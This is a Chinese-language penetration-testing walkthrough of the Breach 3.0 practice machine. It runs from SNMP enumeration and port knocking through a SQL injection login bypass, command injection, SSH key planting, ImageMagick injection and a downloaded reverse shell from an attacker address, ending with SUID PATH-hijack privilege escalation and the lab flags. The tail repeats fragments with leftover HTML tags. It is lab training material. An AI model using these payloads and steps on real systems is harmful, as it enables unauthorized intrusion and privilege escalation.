Breach 3.0 靶机渗透测试完整教学文档<\/h1>

靶机概述<\/h2>
Breach 3.0 是一个包含多层网络环境的复杂靶机，涉及端口敲门、SNMP信息泄露、Web应用漏洞、内网渗透、虚拟机逃逸等多种技术。本教学文档将详细记录从信息收集到最终获取所有flag的完整过程。<\/p>

初始信息收集<\/h2>

靶机发现<\/h3>

使用ARP扫描发现靶机IP：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现靶机IP为192.168.206.144（后续可能变为192.168.206.145）<\/p>
端口扫描<\/h3>
初始TCP扫描无结果，考虑以下可能性：<\/p>

扫描命令错误<\/li>
只开放UDP端口<\/li>
需要特定条件才能开放端口（如端口敲门）<\/li>
<\/ol>
扫描UDP端口：<\/p>
nmap -sV -p- -sS -T4 -Pn --min-rate 1000<\/span> -sU 192.168.206.144
<\/span><\/span><\/code><\/pre>发现开放161端口（SNMP服务）<\/p>
SNMP信息收集<\/h2>
SNMP枚举<\/h3>
使用snmpwalk收集信息：<\/p>
snmpwalk -Os -c public -v 1<\/span> 192.168.206.144
<\/span><\/span><\/code><\/pre>关键信息：<\/p>

邮箱：Milton@breach.local<\/li>
电话号码：(545)-232-1876<\/li>
主机名：Initech-DMZ01<\/li>
注释："Initech - is this thing on? I doubt anyone thinks to look here, anyways, I've left myself a way back in and burn the place down once again."<\/li>
<\/ul>
端口敲门<\/h3>
根据SNMP获取的电话号码尝试端口敲门：<\/p>
knock 192.168.206.144 545<\/span> 232<\/span> 1876<\/span>
<\/span><\/span><\/code><\/pre>敲门后重新扫描，发现开放新端口<\/p>
Web应用渗透<\/h2>
初始访问<\/h3>
发现HTTP服务运行在8端口，访问后需要登录：<\/p>

用户名：milton<\/li>
密码：thelaststraw（来自Breach系列第一个靶机）<\/li>
<\/ul>
目录扫描<\/h3>
使用dirsearch扫描：<\/p>
python3 dirsearch.py -u "http:\/\/192.168.206.144:8\/breach3"<\/span>
<\/span><\/span><\/code><\/pre>发现\/images和\/blog目录<\/p>
SQL注入<\/h3>
在登录处发现SQL注入漏洞，手工注入payload：<\/p>
1' or'1'like'1
<\/code><\/pre>
成功登录为admin用户<\/p>
命令注入<\/h3>
在livechat.php页面发现命令注入点：<\/p>
http:\/\/192.168.206.144:8\/breach3\/thebobscloudhostingllc\/livechat.php?searcher=Submit
<\/code><\/pre>
测试发现可执行命令但无法出网<\/p>
权限提升<\/h2>
用户切换<\/h3>
发现samir用户具有sudo权限可执行chmod：<\/p>
User samir may run the following commands on Initech-DMZ01:
<\/span><\/span>    (<\/span>thebobs)<\/span> NOPASSWD: \/bin\/chmod
<\/span><\/span><\/code><\/pre>SSH密钥利用<\/h3>
在thebobs用户的.ssh目录发现权限配置不当（777）：<\/p>

将公钥写入authorized_keys<\/li>
设置正确权限：<\/li>
<\/ol>
sudo -u thebobs chmod 700<\/span> \/home\/thebobs\/.ssh\/
<\/span><\/span>sudo -u thebobs chmod 600<\/span> \/home\/thebobs\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>
使用SSH连接：<\/li>
<\/ol>
ssh thebobs@192.168.206.144 -i ssh -o PubkeyAcceptedKeyTypes=<\/span>+ssh-rsa
<\/span><\/span><\/code><\/pre>获取第一个flag：<\/p>
breach3{the_dmz_is_burning}
<\/code><\/pre>
内网渗透<\/h2>
内网发现<\/h3>
发现内网网段192.168.122.0\/24，使用nmap扫描发现两台主机<\/p>
端口转发<\/h3>
使用SSH隧道转发内网服务：<\/p>
ssh thebobs@192.168.206.145 -i ssh -o PubkeyAcceptedKeyTypes=<\/span>+ssh-rsa -L 4455:192.168.122.65:80
<\/span><\/span><\/code><\/pre>ImageMagick漏洞利用<\/h3>
在PDF转换服务中发现ImageMagick命令注入：<\/p>
convert "pdfconverter.php.pdf | `sleep 5` "<\/span> 1.png
<\/span><\/span><\/code><\/pre>写入Webshell：<\/p>
http<\/span>:\/\/<\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span>5566<\/span>\/<\/span>intranet<\/span>\/<\/span>6.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre>反弹Shell<\/h3>

本地准备反弹shell的PHP文件<\/li>
靶机下载并执行：<\/li>
<\/ol>
wget http:\/\/192.168.206.132:9966\/shell2.php
<\/span><\/span>php shell2.php
<\/span><\/span><\/code><\/pre>获取第二个flag：<\/p>
breach3{what_secrets_is_bill_hiding?}
<\/code><\/pre>
最终权限提升<\/h2>
内核漏洞尝试<\/h3>
尝试多种内核提权漏洞（如dirty cow）但失败<\/p>
浏览器漏洞利用<\/h3>
发现内网主机使用Firefox\/22.0（存在漏洞），使用Metasploit模块：<\/p>
exploit\/multi\/browser\/firefox_tostring_console_injection
<\/code><\/pre>
SUID提权<\/h3>
发现\/home\/blumbergh\/swingline具有SUID权限，分析发现执行ncat命令<\/p>
环境变量劫持提权步骤：<\/p>

创建恶意ncat文件：<\/li>
<\/ol>
echo '#!\/bin\/bash'<\/span> > ncat
<\/span><\/span>echo 'cp \/bin\/bash \/tmp\/shell'<\/span> >> ncat
<\/span><\/span>echo 'chmod +s \/tmp\/shell'<\/span> >> ncat
<\/span><\/span>chmod +x ncat
<\/span><\/span><\/code><\/pre>
设置PATH环境变量：<\/li>
<\/ol>
export PATH=<\/span>\/home\/blumbergh:$PATH
<\/span><\/span><\/code><\/pre>
执行swingline程序：<\/li>
<\/ol>
.\/swingline
<\/span><\/span><\/code><\/pre>
运行提权后的shell：<\/li>
<\/ol>
\/tmp\/shell -p
<\/span><\/span><\/code><\/pre>获取第三个flag：<\/p>
breach3{the_final_countdown}
<\/code><\/pre>
总结<\/h2>
本靶机涉及的关键技术点：<\/p>

SNMP信息收集与利用<\/li>
端口敲门技术<\/li>
Web应用SQL注入<\/li>
命令注入漏洞利用<\/li>
SSH密钥错误配置利用<\/li>
内网渗透与端口转发<\/li>
ImageMagick漏洞利用<\/li>
浏览器漏洞利用<\/li>
SUID与环境变量劫持提权<\/li>
<\/ol>
通过这个复杂的多层靶机，可以全面练习从外网渗透到内网横向移动的完整攻击链。<\/p>

Breach 3.0 靶机渗透测试完整教学文档<\/h1>

靶机概述<\/h2> Breach 3.0 是一个包含多层网络环境的复杂靶机，涉及端口敲门、SNMP信息泄露、Web应用漏洞、内网渗透、虚拟机逃逸等多种技术。本教学文档将详细记录从信息收集到最终获取所有flag的完整过程。<\/p>

初始信息收集<\/h2>

SNMP信息收集<\/h2>

Web应用渗透<\/h2>

权限提升<\/h2>

内网渗透<\/h2>

内网发现<\/h3> 发现内网网段192.168.122.0\/24，使用nmap扫描发现两台主机<\/p>

最终权限提升<\/h2>

内核漏洞尝试<\/h3> 尝试多种内核提权漏洞（如dirty cow）但失败<\/p>

靶机概述<\/h2>
Breach 3.0 是一个包含多层网络环境的复杂靶机，涉及端口敲门、SNMP信息泄露、Web应用漏洞、内网渗透、虚拟机逃逸等多种技术。本教学文档将详细记录从信息收集到最终获取所有flag的完整过程。<\/p>

内网发现<\/h3>
发现内网网段192.168.122.0\/24，使用nmap扫描发现两台主机<\/p>

内核漏洞尝试<\/h3>
尝试多种内核提权漏洞（如dirty cow）但失败<\/p>